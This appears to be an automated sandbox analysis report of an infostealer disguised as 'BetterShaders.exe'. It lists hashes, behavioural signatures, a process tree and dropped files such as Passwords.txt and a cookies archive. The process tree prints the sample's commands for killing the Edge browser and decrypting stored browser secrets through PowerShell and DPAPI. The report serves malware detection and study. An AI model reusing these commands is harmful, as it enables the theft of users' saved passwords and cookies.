Analysis

  • max time kernel
    151s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240508-en locale:en-us os:windows10-2004-x64 system
  • submitted
    27/05/2024, 14:34

General

  • Target

    BetterShaders.exe

  • Size

    168.8MB

  • MD5

    26e51744ce941b55c7653e9ab229a18f

  • SHA1

    bd08f0f5b3f64aba844128dfb2d77312bbef8b46

  • SHA256

    3bcf3c61e80cc6346a8af84c89ca2c50a9eef2b6b915c6c73fff8725f1c6b118

  • SHA512

    a308443b59a0a5713b99474e30f93a7f8cc98120c11c2f9f5884d5aa61bbf0073a6cfb1c67d676d64656988802fbf1bb8a1f5234df09b1fd2c36f5f7d3fed0a4

  • SSDEEP

    1572864:du3SXrDDmfijsEGl0y+Mgp4cLTRN/33i/oHHl9sqPwqZdsJ2DWw3h9JByba/:/XX++LYYyba

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
    "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\taskkill.exe
        taskkill /IM msedge.exe /F
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3472
    • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
      "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:2
      2⤵
        PID:1288
      • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
        "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
        2⤵
          PID:4512
        • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
          "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2592
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:3624
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:3656
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:4660
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:3792
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"
          1⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:3788

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f48896adf9a23882050cdff97f610a7f

          SHA1

          4c5a610df62834d43f470cae7e851946530e3086

          SHA256

          3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

          SHA512

          16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          68d80cc2ac40ea9e5c7297fba6623c45

          SHA1

          05908daef7414f753fa6006082c42485002a7da8

          SHA256

          3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96

          SHA512

          2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6

        • C:\Users\Admin\AppData\Local\Temp\57c9bfb3-4a0d-4cb3-a484-dd0ed82883c5.tmp.node

          Filesize

          1.8MB

          MD5

          3072b68e3c226aff39e6782d025f25a8

          SHA1

          cf559196d74fa490ac8ce192db222c9f5c5a006a

          SHA256

          7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

          SHA512

          61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

        • C:\Users\Admin\AppData\Local\Temp\Autofills.txt

          Filesize

          90B

          MD5

          8fb196cd3b31b00bb8e35df5c490ade1

          SHA1

          cf7acf3dde5ba8f808be6025cf28dfe573120307

          SHA256

          969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8

          SHA512

          1c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581

        • C:\Users\Admin\AppData\Local\Temp\Passwords.txt

          Filesize

          71B

          MD5

          4d6eadc6c0ff2a52aae242512cface64

          SHA1

          58585d6d017a8c2a597d7b88e98825c59f3368c5

          SHA256

          d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09

          SHA512

          63fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfafqys2.vmm.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1592-14-0x000002D4EB740000-0x000002D4EB762000-memory.dmp

          Filesize

          136KB

        • memory/1592-17-0x000002D4EBB40000-0x000002D4EBB90000-memory.dmp

          Filesize

          320KB

        • memory/2592-92-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-94-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-95-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-96-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-97-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-93-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-91-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-85-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-86-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-87-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/3788-79-0x00007FF951E00000-0x00007FF951E18000-memory.dmp

          Filesize

          96KB

        • memory/3788-68-0x00007FF95FE90000-0x00007FF95FEA8000-memory.dmp

          Filesize

          96KB

        • memory/3788-73-0x00007FF95B8B0000-0x00007FF95B8CD000-memory.dmp

          Filesize

          116KB

        • memory/3788-71-0x00007FF95B9E0000-0x00007FF95B9F7000-memory.dmp

          Filesize

          92KB

        • memory/3788-74-0x00007FF95B860000-0x00007FF95B871000-memory.dmp

          Filesize

          68KB

        • memory/3788-72-0x00007FF95B9A0000-0x00007FF95B9B1000-memory.dmp

          Filesize

          68KB

        • memory/3788-70-0x00007FF95C310000-0x00007FF95C321000-memory.dmp

          Filesize

          68KB

        • memory/3788-69-0x00007FF95F410000-0x00007FF95F427000-memory.dmp

          Filesize

          92KB

        • memory/3788-67-0x00007FF94B8B0000-0x00007FF94BB66000-memory.dmp

          Filesize

          2.7MB

        • memory/3788-78-0x00007FF95B610000-0x00007FF95B631000-memory.dmp

          Filesize

          132KB

        • memory/3788-80-0x00007FF951DD0000-0x00007FF951DE1000-memory.dmp

          Filesize

          68KB

        • memory/3788-81-0x00007FF94BD40000-0x00007FF94BD51000-memory.dmp

          Filesize

          68KB

        • memory/3788-82-0x00007FF94BD20000-0x00007FF94BD31000-memory.dmp

          Filesize

          68KB

        • memory/3788-83-0x00007FF947000000-0x00007FF947035000-memory.dmp

          Filesize

          212KB

        • memory/3788-84-0x000002509B900000-0x000002509BA13000-memory.dmp

          Filesize

          1.1MB

        • memory/3788-77-0x00007FF9478D0000-0x00007FF948980000-memory.dmp

          Filesize

          16.7MB

        • memory/3788-76-0x00007FF95B700000-0x00007FF95B741000-memory.dmp

          Filesize

          260KB

        • memory/3788-75-0x00007FF94B6A0000-0x00007FF94B8AB000-memory.dmp

          Filesize

          2.0MB

        • memory/3788-66-0x00007FF95B8D0000-0x00007FF95B904000-memory.dmp

          Filesize

          208KB

        • memory/3788-65-0x00007FF7020B0000-0x00007FF7021A8000-memory.dmp

          Filesize

          992KB